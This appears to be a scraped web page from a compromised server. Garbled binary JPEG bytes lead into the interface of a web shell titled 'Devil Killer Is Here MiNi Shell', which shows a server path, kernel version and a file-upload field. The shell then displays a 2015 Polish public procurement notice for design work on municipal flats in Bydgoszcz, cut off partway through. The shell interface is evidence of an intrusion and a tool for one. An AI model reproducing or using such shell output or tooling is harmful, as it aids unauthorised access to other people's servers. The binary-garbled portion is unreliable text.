JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150126/17744-N-2015.html

<p class="kh_header"><b>Bydgoszcz: 6/P/2015</b><br>
<b>Numer ogłoszenia: 17744 - 2015; data zamieszczenia: 26.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spólka prawa handlowego - pełnomocnik Miasta Bydgoszcz.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 6/P/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dotyczącej modernizacji lokali mieszkalnych zarządzanych przez Administrację Domów Miejskich ADM Sp. z o.o. w Bydgoszczy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie  ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj. WYKONAŁ   (warunek dla wszystkich zadań): 
* 1 projekt budowlany dotyczący budowy budynku mieszkalnego lub 1 projekt budowlany  dotyczący przebudowy/ remontu/modernizacji lokalu mieszkalnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum (warunek dla wszystkich zadań):
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności  instalacyjnej  w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych -  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących przepisów prawa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno-budowlanej zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących przepisów prawa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane   (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej obowiązujących przepisów prawa
UWAGA: W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do ww. zdobyte  w innych państwach,  na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994 r.  Prawo budowlane (tekst jednolity z 2013 r., poz. 1409 ze zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>* 1 projekt budowlany dotyczący budowy budynku mieszkalnego lub 1 projekt budowlany  dotyczący przebudowy/ remontu/modernizacji  lokalu mieszkalnego.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca  zobowiązany jest złożyć wraz z OFERTĄ następujące  dokumenty :
1. w przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów - pisemne zobowiązanie (oświadczenie) innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia (złożone w  oryginale)
UWAGA: Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art, 26 ust.2b uPzp, na podstawie art.26 ust.2e uPzp odpowiada solidarnie z wykonawcą zamówienia za szkodę Zamawiającego, powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo o którym mowa w pkt.7.5. ust.1) niniejszej SIWZ (złożone w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii )
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika (w oryginale lub notarialnie poświadczonej za  zgodność z oryginałem kopii)
4. Podmioty wspólnie ubiegające się o udzielenie zamówienia: zgodnie z art.23 uPzp Zamawiający dopuszcza możliwość składania jednej oferty przez dwa lub więcej podmioty/ów jednak pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy - wówczas do oferty należy dołączyć pełnomocnictwo, z którego wynikać będzie zakres umocowania.
2) każdy z wykonawców musi oddzielnie udokumentować - przedkładając dokumenty, o których mowa  w pkt.7.2. SIWZ, że nie podlega wykluczeniu na podstawie  art.24 ust.1. ustawy Pzp oraz  złożyć listę kapitałową  albo informację  o tym, że nie należy do grupy kapitałowej,o której mowa w pkt.7.3. SIWZ
3) wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni łącznie spełniać warunki udziału  w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp, a określone przez Zamawiającego w  pkt.6.2. SIWZ
4) oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
5) jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy może zażądać przedłożenia umowy regulującej współpracę wykonawców.
5. Formularz oferty zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich ADM Sp. z o.o. 
Dział Zamówień Publicznych  
85-005 Bydgoszcz  ul. Gdańska 9 
( 2 piętro, pokój 2 ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 11:00, miejsce: Administracja Domów Miejskich ADM Sp. z o.o. 
Dział Zamówień Publicznych  
85-005 Bydgoszcz  ul. Gdańska 9 
( 2 piętro, pokój 2 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 6/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie modernizacji lokalu mieszkalnego przy ul.  Grunwaldzkiej 55/2 wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową. Dokumentacja winna uwzględniać ewentualną  zmianę sposobu użytkowania pomieszczeń w obrębie lokalu mieszkalnego               polegającą na uzyskaniu poprawy funkcji pomieszczeń sanitarnych i kuchni oraz wykonanie etażowego c.o. gazowego piecem dwufunkcyjnym w lokalu mieszkalnym.
Zakres dokumentacji projektowej modernizacji (remontu) lokalu winien obejmować m. in.: 
- prace branży budowlanej, elektrycznej, wodno - kanalizacyjnej i instalacyjnej (gaz)
- wymianę lub montaż urządzeń sanitarnych i gazowych
- wykonanie etażowego gazowego centralnego ogrzewania 
- wykonanie wentylacji
- wymianę stolarki okiennej i drzwiowej:
a) wymianę stolarki okiennej zespolonej odtwarzającej podziały, wielkości, profile i zdobienia stolarki oraz montaż nawiewników higrosterowalnych
b) częściową wymianę stolarki drzwiowej drewnianej odtwarzającej zdobienia stolarki historycznej 
Szczegółowy zakres  zamówienia  obejmuje:
1) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót: branże budowlana, elektryczna, sanitarna (wod.-kan, gaz), instalacja grzewcza. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,                       z  podziałem na części -  tak jak kosztorys inwestorski
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji                papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i                 zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii  itp. dokumentów do opracowania                        dokumentacji projektowej oraz  do uzyskania decyzji  pozwolenia na wykonanie robót.
3)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii (w tym Miejskiego Konserwatora Zabytków - jeżeli zajdzie taka konieczność), uzgodnień, koniecznych do opracowania dokumentacji              projektowej oraz uzyskania przez niego decyzji pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji  pozwolenia na wykonanie robót budowlanych objętych projektem.
3) przed przystąpieniem do prac projektowych - Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji - koncepcję modernizacji lokalu mieszkalnego.
Termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  w ciągu :  50 dni  od daty  podpisania umowy przez Wykonawcę.
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później jednak niż  w terminie  120  dni  od  daty  podpisania umowy przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 6/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2:  obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie              modernizacji lokali mieszkalnych nr 8 i nr 9  przy ul. Racławickiej 7 wraz z uzyskaniem przez                 Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową. Dokumentacja winna uwzględniać zmianę funkcji pomieszczeń polegającą na wydzieleniu w obrębie lokalu nr 8 pomieszczenia łazienki (lub wc) oraz wykonanie w lokalu mieszkalnym nr 8 i 9 ogrzewania gazowego oraz c.w.u.  z kotłów gazowych dwufunkcyjnych wraz z wyposażeniem w kotły c.o. (lokale mieszkalne nr 8 i 9             posiadają wspólny przedpokój gdzie wyznaczono stanowiska do gazomierzy).
Zakres dokumentacji projektowej modernizacji (remontu) lokalu  winien obejmować m. in.:
- prace branży budowlanej (m. in. remont podłóg, remont ścian - likwidacja wilgoci, wykonanie tynków wewnętrznych i prace malarskie),
- elektrycznej (wymiana instalacji elektrycznej wraz z osprzętem),
- wodno-kanalizacyjnej (wymiana/wykonanie nowej instalacji wod.-kan. z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej, wyposażenie lokalu w urządzenia sanitarne wraz z wykonaniem podłączeń wod.-kan.)
- gazowej (wykonanie inwentaryzacji budowlanej na podstawie, której należy zaprojektować wykonanie instalacji gazowej do urządzeń, dobór kotła gazowego dwufunkcyjnego, instalacji c.o. i c.w.u. wraz z doborem grzejników. Należy uzyskać opinię kominiarską o dostępności przewodów spalinowych i wentylacyjnych)
- wykonanie wentylacji pomieszczeń kuchni i łazienki (lub wc)
- wymiana stolarki okiennej i drzwiowej :
a) wymianę stolarki okiennej drewnianej na PCV (z zachowaniem podziału i kształtu okien) wraz z wyposażeniem jej w nawiewniki okienne higrosterowalne
b) wymianę stolarki drzwiowej 
Szczegółowy zakres  zamówienia  obejmuje:
1) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót: branże budowlana, elektryczna, sanitarna (wod.-kan), instalacja grzewcza. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,                      z podziałem na części -  tak jak kosztorys inwestorski
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji                papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów do opracowania dokumentacji projektowej oraz  do uzyskania decyzji  pozwolenia na wykonanie robót,
3)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji              Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii (w tym Miejskiego Konserwatora Zabytków - jeżeli zajdzie taka konieczność), uzgodnień, koniecznych do opracowania dokumentacji               projektowej oraz uzyskania przez niego decyzji pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji                  pozwolenia na wykonanie robót budowlanych objętych projektem.
3) Zamawiający przekaże Wykonawcy wybranemu do realizacji zamówienia - wstępną opinię kominiarską, którą należy uwzględnić w dokumentacji projektowej oraz warunki przyłączenia do sieci gazowej
4) przed przystąpieniem do prac projektowych - Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji - koncepcję modernizacji lokali mieszkalnych.
Termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  w ciągu :  50 dni  od daty  podpisania umowy przez Wykonawcę.
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później jednak niż  w terminie  120  dni  od  daty  podpisania umowy przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 6/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3:  obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie               modernizacji lokalu mieszkalnego przy ul. Rycerskiej 7/8 wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową. Dokumentacja winna uwzględniać zmianę funkcji pomieszczeń polegającą na wydzieleniu w obrębie lokalu  pomieszczenia łazienki (lub wc) oraz wykonanie ogrzewania gazowego i c.w.u. z kotła gazowego dwufunkcyjnego wraz z wyposażeniem     w kocioł c.o.
Zakres dokumentacji projektowej modernizacji (remontu) lokalu  winien obejmować m. in.:
- prace branży budowlanej (m. in. remont podłóg, remont ścian - likwidacja wilgoci, wykonanie tynków wewnętrznych i prace malarskie,  wykonanie wentylacji pomieszczeń kuchni i łazienki lub wc)
- prace branży elektrycznej (wymiana instalacji elektrycznej wraz z osprzętem),
